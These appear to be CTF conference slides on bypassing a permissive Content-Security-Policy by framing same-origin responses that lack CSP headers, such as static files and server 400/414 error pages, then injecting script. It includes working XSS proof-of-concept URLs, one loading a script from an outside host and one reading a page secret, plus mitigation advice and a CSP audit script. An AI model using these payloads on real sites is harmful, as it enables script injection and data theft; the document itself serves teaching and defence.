VolgaCTF 2018 - Neatly bypassing CSP

How to trick CSP in letting you run whatever you want

  1. CSP bypass challenge
     default-src 'self' 'unsafe-inline'; sandbox allow-forms allow-same-origin allow-scripts allow-modals
     hsts.pro/csp.php
  2. https://deepsec.net/docs/Slides/2016/CSP_Is_Dead,_Long_Live_Strict_CSP!_Lukas_Weichselbaum.pdf
  3. Content-Security-Policy: default-src 'self' 'unsafe-inline';
  4. Content-Security-Policy: default-src 'self' 'unsafe-inline';
  5. Content-Security-Policy: default-src 'self' 'unsafe-inline';
  6. CSP BYPASS
  7. Neatly bypassing CSP
  8. CSP BYPASS
  9. ? Content-Security-Policy: default-src 'self' 'unsafe-inline';
  10. Frame a same-origin resource that the server returns without the CSP header (here a static stylesheet); default-src 'self' permits framing it:
      frame = document.createElement("iframe")
      frame.src = "/css/bootstrap.min.css"
      document.body.appendChild(frame)
  11. Then inject a script into the framed document. The frame is same-origin, so the parent can write into it, and the framed document carries no CSP of its own, so the script may load from anywhere:
      script = document.createElement('script')
      script.src = '//bo0om.ru/csp.js'
      let myframe = window.frames[0].document
      myframe.head.appendChild(script)
  12. PoC #1
      http://hsts.pro/csp.php?xss=f=document.createElement(%22iframe%22);f.id=%22pwn%22;f.src=%22/robots.txt%22;f.onload=()=%3E%7Bx=document.createElement(%27script%27);x.src=%27//bo0om.ru/csp.js%27;pwn.contentWindow.document.body.appendChild(x)%7D;document.body.appendChild(f);
      OR bit.ly/2MEip1P
      Decoded xss parameter:
      f=document.createElement("iframe");f.id="pwn";f.src="/robots.txt";f.onload=()=>{x=document.createElement('script');x.src='//bo0om.ru/csp.js';pwn.contentWindow.document.body.appendChild(x)};document.body.appendChild(f);
  13. X-Frame-Options: deny? (If the application also forbids framing its own resources, look for a response the web server generates by itself, such as an error page.)
  14. Nginx + /../ = 400
  15. Apache + /%%z = 400
  16. Nope?
  17. What is the maximum length of a URL? (Exceed the server's limit and it answers with its own 414 error page, without the application's headers.)
  18. Nginx
  19. Apache
  20. frame = document.createElement("iframe")
      frame.src = "/" + "A".repeat(20000)
      document.body.appendChild(frame)
  21. Cookie
  22. • Create a humongous cookie:
        for (var i = 0; i < 5; i++) { document.cookie = i + "=" + "a".repeat(4000) };
      • Open an iframe on any same-origin address; the oversized Cookie header makes the server return an error page (for example Nginx's 400 Request Header Or Cookie Too Large), often without XFO or CSP.
      • Remove the humongous cookie:
        for (var i = 0; i < 5; i++) { document.cookie = i + "=" };
      • Write your own JS script into the frame; it steals the parent's secret.
  23. PoC #2
      http://hsts.pro/csp.php?xss=for%28var%20i=0;i%3C5;i%2b%2b%29%7Bdocument.cookie=i%2b%22=%22%2b%22a%22.repeat%284000%29%7D;f=document.createElement%28%22iframe%22%29;f.id=%22pwn%22;f.src=%22/%22;f.onload=%28%29=%3E%7Bfor%28var%20i=0;i%3C5;i%2b%2b%29%7Bdocument.cookie=i%2b%22=%22%7D;x=document.createElement%28%27script%27%29;x.src=%27data:,alert%28%22Pwned%20%22%2btop.secret.textContent%29%27;pwn.contentWindow.document.body.appendChild%28x%29%7D;document.body.appendChild%28f%29;
      OR bit.ly/2D1QOry
      Decoded xss parameter:
      for(var i=0;i<5;i++){document.cookie=i+"="+"a".repeat(4000)};f=document.createElement("iframe");f.id="pwn";f.src="/";f.onload=()=>{for(var i=0;i<5;i++){document.cookie=i+"="};x=document.createElement('script');x.src='data:,alert("Pwned "+top.secret.textContent)';pwn.contentWindow.document.body.appendChild(x)};document.body.appendChild(f);
  24. FixMe
      • CSP headers should be present on all pages, even on the error pages returned by the web server.
      • CSP options should restrict rights to just those needed by the specific resource. Start with Content-Security-Policy-Report-Only: default-src 'none' and gradually add permission rules for specific use cases.
      • If you have to use 'unsafe-inline' to load and process the resources correctly, your only protection is a nonce or hash source. Otherwise you are exposed to XSS, and if CSP doesn't protect, why have it in the first place?!
  25. Q?
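The FixMe slide asks for two things that are easy to get wrong and easy to check mechanically: a CSP on every response, error pages included, and no 'unsafe-inline' left in effect for scripts. The Node.js audit below is an added example, not code from the slides or from the challenge. It parses Content-Security-Policy headers, resolves the fallback to default-src, decides whether inline script is really allowed (CSP Level 2+ browsers ignore 'unsafe-inline' once a nonce or hash is present in the same directive), and flags any response that carries no CSP at all. The header on /csp.php is taken from slide 1; the 414 error response, the /fixed.php page and its nonce value are constructed for illustration.

```javascript
'use strict';

// Parse "directive src src; directive src" into Map<directive, Set<source>>.
function parseCsp(header) {
  const policy = new Map();
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...sources] = tokens;
    policy.set(name.toLowerCase(), new Set(sources));
  }
  return policy;
}

// Fetch directives that are absent fall back to default-src; frame-src tries
// child-src first. Only the directives this audit needs are listed.
const FALLBACK = {
  'script-src': ['default-src'],
  'style-src': ['default-src'],
  'img-src': ['default-src'],
  'connect-src': ['default-src'],
  'object-src': ['default-src'],
  'child-src': ['default-src'],
  'frame-src': ['child-src', 'default-src'],
};

// The Set of sources governing `directive`, or null when nothing does
// (that resource type is then unrestricted).
function effectiveSources(policy, directive) {
  for (const name of [directive, ...(FALLBACK[directive] || [])]) {
    if (policy.has(name)) return policy.get(name);
  }
  return null;
}

// Inline script runs only if 'unsafe-inline' is present AND the same
// directive has no nonce-/hash-source, which is exactly the challenge's case.
function allowsInlineScript(policy) {
  const sources = effectiveSources(policy, 'script-src');
  if (sources === null) return true;
  if (!sources.has("'unsafe-inline'")) return false;
  for (const s of sources) {
    if (/^'(nonce-|sha(256|384|512)-)/i.test(s)) return false;
  }
  return true;
}

function label(res) {
  const p = res.path.length > 40 ? res.path.slice(0, 37) + '...' : res.path;
  return `${res.status} ${p}`;
}

// Audit one response { path, status, headers }; returns a list of findings.
function auditResponse(res) {
  const findings = [];
  const entry = Object.entries(res.headers)
    .find(([name]) => name.toLowerCase() === 'content-security-policy');
  if (!entry) {
    // A same-origin frame of this response is not bound by the page's policy.
    findings.push(`${label(res)}: no Content-Security-Policy header`);
    return findings;
  }
  const policy = parseCsp(entry[1]);
  if (allowsInlineScript(policy)) {
    findings.push(`${label(res)}: inline script allowed ('unsafe-inline' without nonce/hash)`);
  }
  if (effectiveSources(policy, 'object-src') === null) {
    findings.push(`${label(res)}: object-src unrestricted`);
  }
  return findings;
}

function auditAll(responses) {
  return responses.flatMap(auditResponse);
}

// Constructed sample, not a capture: the challenge page (header from slide 1),
// the web server's own error page for an over-long URL (no application
// headers), and a hypothetical fixed page whose nonce neutralises the
// 'unsafe-inline' it keeps for CSP Level 1 browsers.
const SAMPLE_RESPONSES = [
  { path: '/csp.php', status: 200,
    headers: { 'Content-Security-Policy': "default-src 'self' 'unsafe-inline'; sandbox allow-forms allow-same-origin allow-scripts allow-modals" } },
  { path: '/' + 'A'.repeat(20000), status: 414,
    headers: { 'Content-Type': 'text/html' } },
  { path: '/fixed.php', status: 200,
    headers: { 'Content-Security-Policy': "default-src 'none'; script-src 'nonce-d2VsbCBkb25l' 'unsafe-inline'; style-src 'self'; object-src 'none'" } },
];

if (typeof require !== 'undefined' && require.main === module) {
  for (const finding of auditAll(SAMPLE_RESPONSES)) console.log(finding);
}
```

Run it with `node audit.js`; it prints one finding for the challenge page (inline script allowed) and one for the 414 page (no CSP), and nothing for the nonce-based policy. To use it on a real target, replace SAMPLE_RESPONSES with the status and headers of every response you can provoke, including the 400/414 pages that the tricks on slides 17 to 23 produce, since those are exactly the responses an application-level CSP never reaches.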
